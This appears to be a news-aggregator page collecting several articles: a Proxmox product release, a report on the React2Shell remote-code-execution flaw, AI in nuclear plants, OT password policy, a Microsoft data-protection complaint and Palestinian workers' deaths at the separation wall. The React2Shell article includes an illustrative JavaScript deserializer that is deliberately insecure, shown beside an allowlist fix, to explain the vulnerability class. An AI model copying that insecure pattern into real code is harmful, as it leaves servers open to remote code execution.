Benj Edwards is Ars Technica's Senior AI Reporter and founder of the site's dedicated AI beat in 2022. He's also a tech historian with almost two decades of experience. In his free time, he writes and records music, collects vintage computers, and enjoys nature. He lives in Raleigh, NC.

Proxmox Datacenter Manager 1.0 available

Hacker News
www.proxmox.com
2025-12-04 15:31:12
Comments...
Original Article

VIENNA, Austria – December 04, 2025 – Enterprise software developer Proxmox Server Solutions GmbH (henceforth “Proxmox”) today announced the immediate availability of the stable version 1.0 of Proxmox Datacenter Manager. This new product directly addresses the increasing complexity of operating distributed and large-scale Proxmox-based environments. Proxmox Datacenter Manager offers a holistic single-pane-of-glass view for the administration, monitoring, and scaling of Proxmox VE and Proxmox Backup Server, with the primary goal of providing administrators with comprehensive and seamless control.

Managing growing data centers, distributed across multiple locations or clusters, consistently presents major challenges for enterprises and teams. A lack of global oversight, fragmented metrics, and the need to perform complex operations manually across various environments can quickly lead to inefficiencies and increased error susceptibility.

Proxmox Datacenter Manager was developed as the strategic answer to this scaling challenge. It bridges the gap between individual Proxmox-based nodes and clusters, providing a unified view of the entire infrastructure. This not only simplifies routine tasks but also enables advanced functionalities that were previously difficult to achieve.

Highlights of Proxmox Datacenter Manager 1.0

Proxmox Datacenter Manager delivers a set of core functions specifically designed for managing complex, enterprise-grade environments:

  • Centralized overview and metrics aggregation: Users can connect multiple Proxmox “remotes” (nodes and clusters) and gain a real-time, consolidated overview from a single dashboard. The consolidated dashboard displays the global health status of all Proxmox VE clusters and Proxmox Backup Server instances. It aggregates critical resource usage, including CPU, RAM, and storage I/O, and provides an immediate view of critical key performance indicators (KPIs) and performance metrics to identify bottlenecks and potential issues early on. Data is cached locally, maintaining offline visibility of the last known state.
  • Dynamic, role-based custom views: With customizable dashboards, IT teams can create highly filtered, targeted overviews based on specific remotes, resource types, or operational tags. Crucially, the Proxmox Datacenter Manager leverages its native role-based access control (RBAC) to grant users access to these tailored views without providing direct access to the underlying virtual machines or hosts. This functionality ensures granular permission management and delivers need-to-know transparency across diverse teams and multi-tenant environments.
  • Multi-cluster management: Seamlessly connect to and manage independent Proxmox-based clusters and standalone nodes.
  • Cross-cluster live migration: One of the most prominent features is the capability for the live migration of VMs between different clusters. This empowers administrators to perform responsive load shifts and maintenance work without downtime.
  • Basic VM & container life-cycle management for virtual infrastructure: Routine administrative tasks such as starting, stopping, or configuring VMs, containers, and storage resources can be executed directly from the central interface. Further, with the included native Role-Based Access Control (RBAC), Proxmox Datacenter Manager allows administrators to precisely manage user permissions and centralizes task histories and logs to simplify auditing and meeting compliance requirements.
  • Powerful search functionality: Version 1.0 comes with a highly intuitive and powerful search functionality. Inspired by query languages like those used in Elasticsearch and GitHub, administrators can instantly filter and locate resources. Data can be filtered by resource type (remote, VM, container), status (stopped, running, etc.) or by custom tags, therefore ensuring that even in infrastructures managing thousands of virtual guests, critical resources and diagnostic data are found with unprecedented speed and precision.
  • Centralized SDN capabilities (EVPN): The platform features support for Software-Defined Networking (SDN), enabling the configuration of EVPN zones and VNets across multiple remotes from a single interface, simplifying complex network overlays and network administration in highly scaled environments.
  • Centralized update management: Proxmox Datacenter Manager introduces a central Update Management Panel that gives administrators an instant overview of all available updates across their entire Proxmox VE and Proxmox Backup Server infrastructure. Updates can be rolled out directly from the Datacenter Manager interface, simplifying patch management and strengthening the overall security posture. In addition, Datacenter Manager provides unified, secure shell access to all managed remotes from a single console.
  • Open-source software stack: Proxmox Datacenter Manager is based on Debian 13.2 “Trixie”, uses a newer Linux kernel version 6.17 as stable default, and includes ZFS 2.3. Furthermore, its core software stack is written in the high-performance Rust programming language, with a responsive user interface built upon the new Rust/Yew Proxmox UI framework, delivering enhanced speed and an optimal user experience.

"The modern infrastructure landscape demands adaptability, from data centers to edge locations. Organizations need tools that evolve alongside their business. Proxmox Datacenter Manager is designed as a key building block within our expanding ecosystem, empowering customers with the right solution for every stage of their journey", says Tim Marx, COO at Proxmox. "By choosing the Proxmox ecosystem, organizations unlock a wide range of deployment options. From high-performance setups at hyperscalers to distributed branch offices that maintain data sovereignty. Our consistent commitment to openness ensures long-term interoperability and real freedom of choice for customers and partners."

Availability

Proxmox Datacenter Manager 1.0 is immediately available for download. Users can obtain a complete installation image via ISO download, which contains the full feature-set of the solution and can be installed quickly on bare-metal systems using an intuitive installation wizard.

Seamless distribution upgrades from older versions of Proxmox Datacenter Manager are possible using the standard APT package management system. Furthermore, it is also possible to install Proxmox Datacenter Manager on top of an existing Debian installation. As Free/Libre and Open Source Software (FLOSS), the entire solution is published under the GNU AGPLv3.

For enterprise users, Proxmox Server Solutions GmbH offers professional support through subscription plans. A subscription provides access to the stable Enterprise Repository with timely updates via the web interface, as well as to certified technical support and is recommended for production use. Customers with active Enterprise Support for their Proxmox remotes also gain access to Proxmox Datacenter Manager updates and support.

Resources:

###

About Proxmox Server Solutions
Proxmox provides powerful and user-friendly open-source server software. Enterprises of all sizes and industries use the Proxmox solutions to deploy efficient and simplified IT infrastructures, minimize total cost of ownership, and avoid vendor lock-in. Proxmox also offers commercial support, training services, and an extensive partner ecosystem to ensure business continuity for its customers. Proxmox Server Solutions GmbH was established in 2005 and is headquartered in Vienna, Austria.

Contact: Daniela Häsler, Proxmox Server Solutions GmbH, marketing@proxmox.com

The Math Legend Who Just Left Academia–For an AI Startup Run by a 24-Year-Old

Hacker News
www.wsj.com
2025-12-04 15:26:29
Comments...
Original Article


Critical React, Next.js flaw lets hackers execute code on servers

Bleeping Computer
www.bleepingcomputer.com
2025-12-04 15:11:54
A maximum severity vulnerability, dubbed 'React2Shell', in the React Server Components (RSC) 'Flight' protocol allows remote code execution without authentication in React and Next.js applications. [...]...
Original Article

Critical React, Next.js flaw lets hackers execute code on servers

A maximum severity vulnerability, dubbed 'React2Shell', in the React Server Components (RSC) 'Flight' protocol allows remote code execution without authentication in React and Next.js applications.

The security issue stems from insecure deserialization. It received a severity score of 10/10 and has been assigned the identifiers CVE-2025-55182 for React and CVE-2025-66478 for Next.js (the latter was rejected in the National Vulnerability Database).

Security researcher Lachlan Davidson discovered the flaw and reported it to React on November 29. He found that an attacker could achieve remote code execution (RCE) by sending a specially crafted HTTP request to React Server Function endpoints.

"Even if your app does not implement any React Server Function endpoints, it may still be vulnerable if your app supports React Server Components [RCS]," warns the security advisory from React.

The following packages in their default configuration are impacted:

  • react-server-dom-parcel
  • react-server-dom-turbopack
  • react-server-dom-webpack

React is an open-source JavaScript library for building user interfaces. It's maintained by Meta and widely adopted by organizations of all sizes for front-end web development.

Next.js, maintained by Vercel, is a framework built on top of React that adds server-side rendering, routing, and API endpoints.

Both solutions are widely present in cloud environments through front-end applications that help scale and deploy architectures faster and easier.

Researchers at cloud security platform Wiz warn that the vulnerability is easy to exploit and exists in the default configuration of the affected packages.

Impact and fixes

According to React, the vulnerability is present in versions 19.0, 19.1.0, 19.1.1, and 19.2.0. Next.js is impacted in experimental canary releases starting with 14.3.0-canary.77, and all releases of the 15.x and 16.x branches below the patched versions.

The flaw exists in the 'react-server' package used by React Server Components (RSC), but Next.js inherits it through its implementation of the RSC "Flight" protocol.

Wiz researchers say that 39% of all cloud environments where they have visibility contain instances of Next.js or React running versions vulnerable to CVE-2025-55182, CVE-2025-66478, or both.

The same vulnerability likely exists in other libraries that implement React Server, including the Vite RSC plugin, Parcel RSC plugin, React Router RSC preview, RedwoodSDK, and Waku.

Software supply-chain security company Endor Labs explains that the React2Shell "is a logically insecure deserialization vulnerability where the server fails to properly validate the structure of incoming RSC payloads."

There is a validation failure when receiving the malformed data from the attacker, which results in executing privileged JavaScript code in the context of the server.
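Technical details have not been published yet, so the following is only a generic illustration of this bug class – a deserializer that resolves server-side references named by the client without validating them against an allowlist – and not the actual Flight protocol code:

```javascript
// Generic illustration of insecure deserialization – NOT the React/Next.js code.
const serverFunctions = { getUser: (id) => ({ id, name: "demo" }) };

function insecureDeserialize(payload) {
  const msg = JSON.parse(payload);
  // BUG: resolves *any* property path the client names,
  // e.g. '{"ref":"console.log","args":["pwned"]}'
  const fn = msg.ref.split(".").reduce((obj, key) => obj[key], globalThis);
  return fn(...msg.args);
}

function saferDeserialize(payload) {
  const msg = JSON.parse(payload);
  const fn = serverFunctions[msg.ref]; // allowlist lookup only
  if (typeof fn !== "function") throw new Error("unknown server function");
  return fn(...msg.args);
}
```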

Davidson created a React2Shell website, where he will publish technical details. The researcher also warns that proof-of-concept (PoC) exploits are circulating that are not genuine.

These PoCs invoke functions like vm#runInThisContext, child_process#exec, and fs#writeFile, but a genuine exploit does not need them, the researcher says.

"This would only be exploitable if you had consciously chosen to let clients invoke these, which would be dangerous no matter what," Davidson notes.

He further explained that these fake PoCs would not work with Next.js since these functions are not present due to the list of server functions being managed automatically.

Developers are strongly advised to apply the fixes available in React versions 19.0.1, 19.1.2, and 19.2.1, and Next.js versions 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, and 16.0.7.

Organizations should audit their environments to determine if they use a vulnerable version and take the appropriate action to mitigate the risk.

The popularity of the two solutions is reflected in the number of weekly downloads, as React counts 55.8 million on the Node Package Manager (NPM), and Next.js has 16.7 million on the same platform.

‘Atoms for Algorithms:’ The Trump Administration’s Top Nuclear Scientists Think AI Can Replace Humans in Power Plants

404 Media
www.404media.co
2025-12-04 15:11:34
A presentation at the International Atomic Energy Agency unveiled Big Tech’s vision of an AI and nuclear fueled future....
Original Article

During a presentation at the International Atomic Energy Agency’s (IAEA) International Symposium on Artificial Intelligence on December 3, a US Department of Energy scientist laid out a grand vision of the future where nuclear energy powers artificial intelligence and artificial intelligence shapes nuclear energy in “a virtuous cycle of peaceful nuclear deployment.”

“The goal is simple: to double the productivity and impact of American science and engineering within a decade,” Rian Bahran, DOE Deputy Assistant Secretary for Nuclear Reactors, said.

His presentation and others during the symposium, held in Vienna, Austria, described a world where nuclear powered AI designs, builds, and even runs the nuclear power plants they’ll need to sustain them. But experts find these claims, made by one of the top nuclear scientists working for the Trump administration, to be concerning and potentially dangerous.

Tech companies are using artificial intelligence to speed up the construction of new nuclear power plants in the United States. But few know the lengths to which the Trump administration is paving the way and the part it's playing in deregulating a highly regulated industry to ensure that AI data centers have the energy they need to shape the future of America and the world.

At the IAEA, scientists, nuclear energy experts, and lobbyists discussed what that future might look like. To say the nuclear people are bullish on AI is an understatement. “I call this not just a partnership but a structural alliance. Atoms for algorithms. Artificial intelligence is not just powered by nuclear energy. It’s also improving it because this is a two way street,” IAEA Director General Rafael Mariano Grossi said in his opening remarks.

In his talk, Bahran explained that the DOE has partnered with private industry to invest $1 trillion to “build what will be an integrated platform that connects the world’s best supercomputers, AI systems, quantum systems, advanced scientific instruments, the singular scientific data sets at the National Laboratories—including the expertise of 40,000 scientists and engineers—in one platform.”

Image via the IAEA.

Big tech has had an unprecedented run of cultural, economic, and technological dominance, expanding into a bubble that seems to be close to bursting. For more than 20 years new billion dollar companies appeared seemingly overnight and offered people new and exciting ways of communicating. Now Google search is broken, AI is melting human knowledge , and people have stopped buying a new smart phone every year. To keep the number going up and ensure its cultural dominance, tech (and the US government) are betting big on AI.

The problem is that AI requires massive datacenters to run, and those datacenters need an incredible amount of energy. To solve the problem, the US is rushing to build out new nuclear reactors. Building a new power plant safely is a multi-year process that requires an incredible level of human oversight. It’s also expensive: not every new nuclear reactor project gets finished, and they often run over budget and drag on for years.

But AI needs power now, not tomorrow and certainly not a decade from now.

According to Bahran, the problem of AI advancement outpacing the availability of datacenters is an opportunity to deploy new and exciting tech. “We see a future of and near future, by the way, an AI driven laboratory pipeline for materials modeling, discovery, characterization, evaluation, qualification and rapid iteration,” he said in his talk, explaining how AI would help design new nuclear reactors. “These efforts will substantially reduce the time and cost required to qualify advanced materials for next generation reactor systems. This is an autonomous research paradigm that integrates five decades of global irradiation data with generative AI robotics and high throughput experimentation methodologies.”

“For design, we’re developing advanced software systems capable of accelerating nuclear reactor deployments by enabling AI to explore the comprehensive design spaces, generate 3D models, [and] conduct rigorous failure mode analyzes with minimal human intervention,” he added. “But of course, with humans in the loop. These AI powered design tools are projected to reduce design timelines by multiple factors, and the goal is to connect AI agents to tools to expedite autonomous design.”

Bahran also said that AI would speed up the nuclear licensing process, a complex regulatory process that helps build nuclear power plants safely. “Ultimately, the objective is, how do we accelerate that licensing pathway?” he said. “Think of a future where there is a gold standard, AI trained capacity building safety agent.”

He even said that he thinks AI would help run these new nuclear plants. “We're developing software systems employing AI driven digital twins to interpret complex operational data in real time, detect subtle operational deviations at early stages and recommend preemptive actions to enhance safety margins,” he said.

One of the slides Bahran showed during the presentation attempted to quantify the amount of human involvement these new AI-controlled power plants would have. He estimated less than five percent “human intervention during normal operations.”

Image via IAEA.

“The claims being made on these slides are quite concerning, and demonstrate an even more ambitious (and dangerous) use of AI than previously advertised, including the elimination of human intervention. It also cements that it is the DOE's strategy to use generative AI for nuclear purposes and licensing, rather than isolated incidents by private entities,” Heidy Khlaaf, head AI scientist at the AI Now Institute, told 404 Media.

“The implications of AI-generated safety analysis and licensing in combination with aspirations of <5% of human intervention during normal operations, demonstrates a concerted effort to move away from humans in the loop,” she said. “This is unheard of when considering frameworks and implementation of AI within other safety-critical systems, that typically emphasize meaningful human control.”

💡

Do you know anything else about this story? I would love to hear from you. Using a non-work device, you can message me securely on Signal at +1 347 762-9212 or send me an email at matthew@404media.co.

Sofia Guerra, a career nuclear safety expert who has worked with the IAEA and US Nuclear Regulatory Commission, attended the presentation live in Vienna. “I’m worried about potential serious accidents, which could be caused by small mistakes made by AI systems that cascade,” she said. “Or humans losing the know-how and safety culture to act as required.”

About the author

Matthew Gault is a writer covering weird tech, nuclear war, and video games. He’s worked for Reuters, Motherboard, and the New York Times.

Matthew Gault

How strong password policies secure OT systems against cyber threats

Bleeping Computer
www.bleepingcomputer.com
2025-12-04 15:11:22
OT environments rely on aging systems, shared accounts, and remote access, making weak or reused passwords a major attack vector. Specops Software explains how stronger password policies and continuous checks for compromised credentials help secure critical OT infrastructure. [...]...
Original Article

Specops OT Environment

Operational technology (OT) interacts with crucial real-world infrastructure, empowering everything from energy plants to manufacturing facilities. Such environments are obvious targets for cyberattacks , but OT security often leaves much to be desired.

OT is a broader concept than IT, describing the systems, both software and hardware, that underpin industrial environments. This means OT works directly with the physical world : things like Supervisory Control and Data Acquisition (SCADA) systems or Industrial Control Systems (ICS).

While there’s significant overlap with IT, the priorities are very different. As the UK’s National Cyber Security Centre (NCSC) notes:

“Where cybersecurity for IT has traditionally been concerned with information confidentiality, integrity and availability, OT priorities are often safety, reliability and availability, as there are clearly physical dangers associated with OT failure or malfunction.”

Key password challenges in OT security

OT environments aren’t just tempting targets for criminals; they are also uniquely vulnerable. For instance, the hardware and software in these environments are often outdated and resource-constrained, notes the World Economic Forum.

And things are growing more complex. IT and OT are increasingly intermingled, creating the potential for a criminal to exploit user credentials or reused passwords to expand their attacks. The Internet of Things (IoT) introduces a new layer of connected systems that naturally increases the attack surface.

There are also unique challenges when it comes to passwords. As in the IT space, passwords remain a core function of security, even when users deploy multi-factor authentication (MFA) and other complementary approaches. However, the OT sector faces exacerbated risks and even unique dangers when compared with IT.

Interested to know how many of your users have weak or breached passwords? Run a read-only scan of your Active Directory today with our free tool: Specops Password Auditor .

Shared accounts and workstations

Sometimes, credential-sharing can enable bad actors to expand their threat, even moving from IT systems to OT and physical infrastructure. Likewise, the nature of OT work – for example, in remote infrastructure – can see people sharing workstations, increasing overall vulnerability.

Risks from remote access

Often, vendors and other third parties will need to access the OT environment remotely: this could involve specialists working on support or maintenance contracts, for instance. Such remote access pathways could introduce new vulnerabilities that need to be protected .

Outdated OT systems

Big infrastructure investments in areas like energy or manufacturing are often made with long-term operations in mind, not necessarily the demands of cybersecurity; indeed, some of the systems used in the OT environment may have been put in place years or even decades ago. This could introduce opportunities for sophisticated, modern cybercriminals.

Strengthening OT password security

So how can operators of OT environments mitigate the risk? It’s vital to build robust foundations by adopting best practices for password policies .

Password security is just as important in OT environments as in IT, and in some instances may be even more vital, given the potentially life-threatening consequences that could stem from a shutdown or outage.

Core password best practices for OT

There are some basic, but vital, priorities to keep in mind:

  1. Password length: This is the single most important factor in password security, particularly as criminals deploy brute-force attacks to crack easily guessable choices (such as common words or repeating characters). For example, a powerful computer that might take one minute to guess an 8-character password could take more than 208 billion minutes to guess a 16-character password, even when both are all lowercase (a quick back-of-the-envelope check follows this list).
  2. Rotation: If you leave a password unchanged for long periods of time, you could provide criminals with an extended opportunity to crack it. A password rotation policy is one way to address this issue, though the specific timeframe used will depend on the organization in question. It’s also important to ensure password hygiene: for example, ensuring that old passwords aren’t reused.
  3. Password vaults: These store information in encrypted format and are often used to protect accounts that cover multiple users . They are usually protected by controls like hardware tokens.
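The arithmetic behind the length example in point 1 checks out – assuming a 26-letter lowercase alphabet and a fixed guessing rate, the 16-character search space is 26^8 (about 208 billion) times larger than the 8-character one:

```javascript
// Back-of-the-envelope brute-force comparison (illustrative only):
// assumes lowercase-only passwords and a rate that cracks 8 chars in ~1 minute.
const ALPHABET = 26;
const guessesPerMinute = Math.pow(ALPHABET, 8); // cracks 8 chars in ~1 minute
const space16 = Math.pow(ALPHABET, 16);         // 16-character search space
console.log((space16 / guessesPerMinute).toLocaleString()); // ≈ 208,827,064,576 minutes
```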

Building a resilient OT security architecture

While passwords remain the linchpin of cybersecurity, they should be used in tandem with other security approaches to build a truly robust OT environment.

For example, MFA is often viewed as the gold standard in security . This boosts the security of OT environments by adding several other layers of security on top of passwords : this could include message-based methods, challenge-based authenticator apps, or FIDO2 authentication.

Some OT environments may also make use of Privileged Access Workstations (PAWs), which essentially separate the infrastructure used for high-risk activities from potentially compromising functions, such as web browsing or email access. However, it’s important to balance security with usability.

Likewise, segmentation and network access controls are important, ensuring that only the right devices (and people) can access designated areas, and that any damage is limited should the worst-case scenario become a reality.

Continuous password protection in OT

Although such security approaches have clear benefits, one thing is certain: poor password security will hugely increase your vulnerability to cyberattack, with potentially serious consequences.

This means it is vital to develop a clear picture of the password security landscape across an OT environment. Specops Password Policy provides this capability. The simple-to-use tool continuously scans for over 4.5 billion compromised passwords in Active Directory, while also blocking users from creating weak passwords in the first place. Book a free trial today .

OT systems interact with some of the most important infrastructure in industry and society, with serious consequences if things go wrong. Robust password security is the cornerstone of resilient OT environments, protecting people and assets for the long term.

Sponsored and written by Specops Software .

Show HN: OnlyRecipe 2.0 – I added all features HN requested – 4 years later

Hacker News
onlyrecipeapp.com
2025-12-04 15:06:08
Comments...
Original Article

Irish authorities asked to investigate Microsoft over alleged unlawful data processing by IDF

Guardian
www.theguardian.com
2025-12-04 14:59:39
Move follows Guardian revelations of Israel’s mass surveillance of Palestinians using Microsoft cloud Irish authorities have been formally asked to investigate Microsoft over alleged unlawful data processing by the Israeli Defense Forces. The complaint has been made by the human rights group the Iri...
Original Article

Irish authorities have been formally asked to investigate Microsoft over alleged unlawful data processing by the Israeli Defense Forces.

The complaint has been made by the human rights group the Irish Council for Civil Liberties (ICCL) to the Data Protection Commission, which has legal responsibility in Europe for overseeing all data processing in the European Union.

It follows revelations in August by the Guardian with the Israeli-Palestinian publication +972 Magazine and the Hebrew outlet Local Call that a giant trove of Palestinians’ phone calls was being stored on Microsoft’s cloud service, Azure, as part of a mass surveillance operation by the Israeli military.

The ICCL alleges that the processing of the personal data “facilitated war crimes, crimes against humanity, and genocide by Israeli military”. Microsoft’s European headquarters are located in Ireland.

Joe O’Brien, the executive director of ICCL, said: “Microsoft’s technology has put millions of Palestinians in danger. These are not abstract data-protection failures.”

He said that the cloud services “enabled real-world violence” and it was “essential that the DPC move quickly and decisively” in view of the “threat to life posed by the issues at the heart of this complaint”.

He added: “When EU infrastructure is used to enable surveillance and targeting, the Irish Data Protection Commission must step in – and it must use its full powers to hold Microsoft to account.”

A cache of leaked documents reviewed by the Guardian revealed that Unit 8200, the Israeli military’s spy agency, had opened talks as far back as 2021 to move vast amounts of top secret intelligence material to the US company’s cloud service.

The documents showed how Microsoft’s storage facility had been used by Unit 8200 to store an expansive archive of everyday Palestinian communications, facilitating targeted airstrikes and other military operations.

In response to the revelations Microsoft ordered an urgent external inquiry to review its relationship with Unit 8200. Its initial findings led the company to cancel the unit’s access to some of its cloud storage and AI services.

ICCL claims that Microsoft facilitated critical components of Israel’s military surveillance “Al Minasseq” system.

It says the alleged “removal” of the records of intercepted phone calls from EU servers to Israel obscured evidence of illegal processing before investigations could commence within the EU and claims that unlawful processing was a breach of the EU’s general data protection regulation (GDPR) governing use of personal data.

Equipped with Azure’s near-limitless storage capacity and computing power, Unit 8200 had built an indiscriminate system allowing its intelligence officers to collect, play back and analyse the content of cellular calls of an entire population.

A spokesperson for the DPC said: “I can confirm that the DPC has received a complaint and it is currently under assessment.”

Microsoft has been approached for comment.

Ben Hutchings: FOSS activity in November 2025

PlanetDebian
www.decadent.org.uk
2025-12-04 14:59:13
Debian packages: debian-cd: Bugs: replied to #1120055: Please include ifenslave, vlan and possibly bridge-utils to netinst CD firmware-nonfree: Bugs: ...
Original Article

Better living through software

Ben Hutchings's diary of life and technology

News, Not Slop

Portside
portside.org
2025-12-04 14:55:07
News, Not Slop Kurt Stand Thu, 12/04/2025 - 09:55 ...
Original Article

The NewsGuild-CWA has launched News, Not Slop, a campaign to call for accountability in the use of generative AI in newsrooms. | Photo: NewsGuild-CWA

Politico and E&E News journalists announced a major victory in arbitration this week, successfully arguing that Politico management violated the workers’ collective bargaining agreement by unilaterally introducing two artificial intelligence tools for news coverage without providing notice or bargaining over their implementation. Per the workers’ union–the PEN Guild, part of the Washington-Baltimore NewsGuild-CWA–it’s one of the first major arbitration cases concerning AI practices in journalism, setting a powerful precedent.

“This ruling is a clear affirmation that AI cannot be deployed as a shortcut around union rights, ethical journalism, or human judgment,” Unit Chair Ariel Wittenberg said in a statement. “This is a win for our members at POLITICO fighting to ensure that AI strengthens our newsroom rather than undermining it.”

Politico and E&E News journalists secured contract language governing how AI tools could be implemented in their first contract. Those collectively-bargained protections require the employer to give 60 days notice before introducing AI tools that substantially impact work or could lead to layoffs, engage in good-faith bargaining concerning those tools, ensure the tools meet Politico’s ethical standards, and require human oversight. The arbitrator ruled that management violated these contract terms twice, through AI-created live summaries of news with factual and style-book errors and an AI Report Builder that created inaccurate reports, citing journalists’ work, lacked any human review, and was riddled with errors. In both instances, management failed to notify the union or bargain over implementation of these tools.

“This ruling affirms that employers cannot use emerging technology as an end-run around contractual obligations,” said Amos Laor, Washington-Baltimore News Guild General Counsel in a statement. “AI tools may be new, but the legal principles we secured in the agreement are not: management must provide notice, bargain with the union, and ensure that innovation does not come at the expense of workers’ rights or diminish their work. For journalists, issues of journalistic integrity are directly tied to their reputation, relationship with readers, and ability to perform their duties, and we view the protection of newsroom ethical standards as an integral part of their labor rights.”

The proliferation of AI slop — poor quality, inaccurate, misleading or just plain weird media — is a growing concern for both creative workers and the general public, from newspaper readers to TikTok users. Its impacts are far-reaching, with the generative tech used to spread misinformation or heighten division, raising broad concerns about reliability and ethics.

“This decision makes it clear that unionized journalists are the ones fighting for accurate news when companies roll out AI spreading misinformation,” said NewsGuild-CWA President Jon Schleuss. “Journalists, by unionizing and demanding quality for their readers, are negotiating stronger ethics, accountability and actual humans producing the news. This ruling is a strong message to every media boss: AI must be implemented responsibly, transparently and through negotiation with journalists.”

Now, NewsGuild-CWA journalists have launched a campaign — News, Not Slop — calling for common-sense protections around artificial intelligence in media, fighting to ensure that AI slop and misinformation doesn’t erode the integrity and reliability of the news coverage we all rely on.

Supporters of ethical, human-made journalism can join the fight by signing their name to a petition targeting newsroom editors across North America.

Israel Revoked a Palestinian’s Work Permit. When He Tried to Cross the Wall, They Shot Him and Left Him to Die.

Intercept
theintercept.com
2025-12-04 14:48:59
Before October 7, Palestinian laborers would cross into Israel for jobs. Then Israel revoked work permits and unleashed a violent crackdown. The post Israel Revoked a Palestinian’s Work Permit. When He Tried to Cross the Wall, They Shot Him and Left Him to Die. appeared first on The Intercept....
Original Article

For many years, Arafat Qaddous worked construction jobs in Israel.

He was one of around 130,000 Palestinians living in the occupied West Bank with permits from the Israeli authorities to cross the separation wall into Israeli territory as a laborer. With his lawful employment inside the Green Line, which separates the West Bank from Israel, he was able to go back and forth from his hometown of Iraq Burin, near Nablus in the north, to whichever Israeli city offered work.

Before the Covid pandemic, the 51-year-old Qaddous’s work in Israel sustained his wife and five children.

His brother Qusai said Arafat’s living conditions worsened over the years, as work opportunities dried up during the pandemic, his family’s needs grew, and the West Bank’s economy tanked.

“My brother risked his life because he needed to provide for his family.”

“There are hardly any jobs in the West Bank,” Qusai said, “and prices of food and goods are extremely high.”

Things got even worse after October 7, 2023: Israel indefinitely paused Palestinian workers’ permits after Hamas’s attack, and Qaddous lost his permit. So when an opportunity presented itself — a job in Taybeh, inside Israel — he took a chance.

“My brother risked his life because he needed to provide for his family at a time when the economic situation was difficult,” Qusai said.

The decision to cross the wall would prove deadly for Qaddous.

On April 26, 2024, Qaddous drove to the barrier. Capped with barbed wire, the wall is over 8 meters tall and runs more than 200 kilometers. Qaddous hoped to jump over it and catch a ride from East Jerusalem to Taybeh. He chose a section of the barrier that separates the Palestinian side of the town of Al-Ram from the Israeli section.

Qaddous paid some local Palestinian men 600 shekels, or $186. The men provided the ladder for getting up the wall, a rope for getting down the other side, and transport to the job site, and served as lookouts throughout the crossing.

Qaddous climbed the ladder, then mayhem broke out. The lookouts spotted an Israeli police jeep. Qaddous fell to the ground.

“The fall did not kill him immediately,” Qusai said. “Israeli police spotted him as he lay on the ground with a serious head injury and prevented an ambulance from reaching him. He bled out. When they were sure he was dead, they allowed paramedics to take his body.”

Shooting Workers

Forty-four Palestinian workers have died trying to cross the wall since October 2023, when Israeli authorities revoked almost all permits, according to the Palestinian Workers’ Union. The deaths, along with serious injuries inflicted by authorities, happened while workers were being chased by Israeli police, beaten, shot at, or fell after jumping off the separation barrier.

The injuries have been growing more serious. Palestinians are increasingly being shot by Israel’s border police, especially in the legs, following an order from far-right Israeli Minister of National Security Itamar Ben-Gvir, according to the Israeli news outlet Walla . Since the start of 2025, at least 106 Palestinians have been shot in the legs by border police at the Israeli separation wall near Jerusalem — including one this week who was shot in the leg when Israeli forces opened fire, according to the Red Crescent.

Israel’s occupation has shaped the West Bank’s economy for nearly six decades, creating a structure in which Palestinians are largely prevented from building a self-sustaining economy and instead pushed into dependency on work in Israel itself or in its illegal settlements.

Before the Gaza genocide got underway in October 2023, almost 20 percent of all Palestinian laborers worked in Israel or its illegal West Bank settlements — mostly in construction and agriculture. That number nosedived to 4 percent immediately after the Hamas-led attack on Israel set off an Israeli onslaught.

Before October 2023, around a quarter million Palestinians, with and without permits, used to commute daily from the Occupied Palestinian Territories, including 19,000 from Gaza, according to Shaher Saad, the secretary-general of the Palestinian Workers’ Union.

Today, fewer than 15,000 Palestinian laborers with permits travel to Israel for work. The drastic reduction cut off a vital liquidity lifeline that provided them with wages 4 to 10 times higher than what they would earn in the occupied territories, where unemployment is more than 50 percent nationally — about 80 percent in Gaza and 35 percent in the West Bank.

Additionally, since October 2023, Israel has staunched the flow of tax revenue to the Palestinian Authority, the home-rule Palestinian government in the West Bank. Israel has withheld and delayed transfers of the revenues back to the Palestinians in contravention of the Oslo Accords, the diplomatic agreement that established the PA and set the stage for a two-state solution whose prospects have all but vanished.

With public salaries hit by the withheld tax revenue and cash running increasingly short, about 40,000 Palestinians with no permits continue to cross into Israel illegally, despite the increased risk of the Israeli crackdown, according to Saad.

For years, Israel has regarded Palestinians — many of whom work in low-skilled positions — as a pool of cheap labor.

Bringing them into the Israeli labor market was presented as a way to boost Palestinian living standards, on the assumption that hardship breeds resistance. Economic gains and financial reliance on Israel, on the other hand, would deter Palestinians from challenging the status quo, helping maintain Israeli dominance.

A structure was created wherein any worker can easily be replaced by the thousands desperate for permits.

At the same time, however, Palestinian workers were far from equal in the workforce. With no guaranteed sick leave, no pension, delayed or denied benefits, and with work permits tied to a specific employer, a structure was created wherein any worker can easily be replaced by the thousands desperate for permits. Palestinian laborers were cheap and disposable. And their mistreatment has worsened since October 7, according to Mohammad Blidi, who heads the workers’ union in Tulkarem, a Palestinian city near the separation wall in the northern West Bank.

“As an occupying power, Israel is legally obliged to provide work for Palestinians, and to respect international labor laws,” Blidi said. “What is happening in reality is far from it. On a daily basis, Palestinian workers are subject to humiliation and beatings.”

Laborers From Gaza

On the day of the October 7 attacks, Israel detained thousands of Palestinian workers from Gaza who were working on permits inside Israel. Although they had the necessary Israeli-issued permission, they were held for at least a month, and many were beaten and interrogated.

That the detained workers were legally in Israel, with permits and the attendant security vetting, according to Blidi, suggests they were detained mainly because they had come from Gaza.

The arrests were carried out “ secretly and illegally ,” according to Gisha, an Israeli group that advocates for Palestinians’ right of movement. There was no legal basis for moving the workers into detention centers, the group said, and they were effectively disappeared, with Israel refusing to disclose the workers’ identities and whereabouts.

Many of the workers described being mistreated in detention — left without food, water, medication, a mattress, or toilet access. They endured harsh violence and psychological abuse, reporting torture and degrading treatment. Israeli soldiers seized all cash and mobile phones from the workers, and two died in Israeli custody.

In one case, a 40-year-old Palestinian man from Gaza City who was working in the Israeli city of Ashkelon on the day of the attack had to flee to Hebron when news came out that laborers from Gaza were being targeted by Israeli police.

Since he could not go back to Gaza, he hunkered down with several other workers in the southern West Bank city awaiting his fate, the man, who requested anonymity for fear of his safety, said in an interview. Then he received word that his pregnant wife and four of his children — two boys and two girls — had been killed in an Israeli airstrike in Gaza City. Only one child survived, but the boy’s leg was seriously injured and he lost an eye in the attack.

Just two days into mourning, the worker was awakened by a loud explosion in the pre-dawn hours. Israeli soldiers blew up the door to the house he was staying in and detained him, along with the others.

